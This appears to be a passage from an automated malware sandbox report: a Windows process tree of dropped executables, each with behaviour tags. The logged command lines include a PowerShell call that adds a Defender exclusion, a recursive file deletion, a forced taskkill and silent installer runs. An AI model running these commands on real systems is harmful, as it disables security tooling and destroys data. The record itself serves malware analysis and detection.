                                                                                                                                                                                                                                                                                                                                                                                                                PID:4560
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1018ef4aa251c026c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                Fri1018ef4aa251c026c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4572
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10fcc13ae0125c8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                Fri10fcc13ae0125c8.exe
                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                PID:4984
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-IV5JV.tmp\Fri10fcc13ae0125c8.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-IV5JV.tmp\Fri10fcc13ae0125c8.tmp" /SL5="$201AA,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10fcc13ae0125c8.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5224
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-VE8VD.tmp\Sayma.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-VE8VD.tmp\Sayma.exe" /S /UID=burnerch2
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5700
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7624
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2F6C2.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2F6C2.tmp\ultramediaburner.tmp" /SL5="$50366,281924,62464,C:\Program Files\Windows Photo Viewer\PBSWAUEFXI\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7772
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8012
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9d-5545f-768-640ad-a5e7b04eff9e3\Mefylawalo.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\9d-5545f-768-640ad-a5e7b04eff9e3\Mefylawalo.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:7764
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa4718
                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8476
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10204
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa4718
                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6212
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\73-dbb7f-a53-c3d8e-280805606b41c\Sakenicalae.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\73-dbb7f-a53-c3d8e-280805606b41c\Sakenicalae.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7936
                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ycna3tef.r2h\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6612
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ycna3tef.r2h\GcleanerEU.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\ycna3tef.r2h\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8276
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 8276 -s 240
                                                                                                                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9652
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cfelq2xo.uh0\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3916
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\cfelq2xo.uh0\installer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\cfelq2xo.uh0\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:14884
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o4551stw.lmt\any.exe & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:14028
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\o4551stw.lmt\any.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\o4551stw.lmt\any.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:14912
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jewjaev1.idy\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:13876
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jewjaev1.idy\gcleaner.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jewjaev1.idy\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1988
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1988 -s 240
                                                                                                                                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11912
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fhonty25.130\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5072
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5324
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5324 -s 452
                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5740
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5324 -ip 5324
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4628 -ip 4628
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5996
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4560 -ip 4560
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3872
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5204 -ip 5204
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4644
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1172 -ip 1172
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:2916
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4836 -ip 4836
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5836
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4992 -ip 4992
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6096 -ip 6096
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1660
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6188
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5020 -ip 5020
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6248
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2480 -ip 2480
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6668
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6752
                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1584
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4344
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5972 -ip 5972
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:6352
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5436 -ip 5436
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5520
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7632 -ip 7632
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7924
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3676
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8636
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\134A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\134A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8820
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\134A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\134A.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3476
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3124.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\3124.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8276
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3124.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\3124.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6256
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3124.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3124.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\NetFrame.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\NetFrame.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:14772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\ProgramData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8636
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:2500
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        taskkill /IM Database.exe /F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9760
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\ProgramData\Systemd\note3dll.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        NULL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4560 -ip 4560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 7676 -ip 7676
